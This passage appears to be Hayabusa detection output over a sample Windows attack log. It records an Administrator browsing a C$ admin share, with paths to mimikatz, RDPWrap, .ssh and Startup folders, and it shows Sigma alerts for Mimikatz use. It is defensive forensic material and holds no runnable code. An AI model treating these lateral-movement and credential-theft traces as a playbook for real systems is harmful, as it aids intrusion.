Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\Administrator.EXAMPLE\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Music\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\.ssh : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share 
Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\New folder : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\RDPWrap-v1.6.2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\translations : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\IEUser\Desktop\release\x32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\db : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\garbage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\memdumps : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\platforms : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\IEUser\Desktop\release\x32\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\db : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\memdumps : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\platforms : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\IEUser\Desktop\release\x64\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\winrar-cve : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Music : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Documents : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share 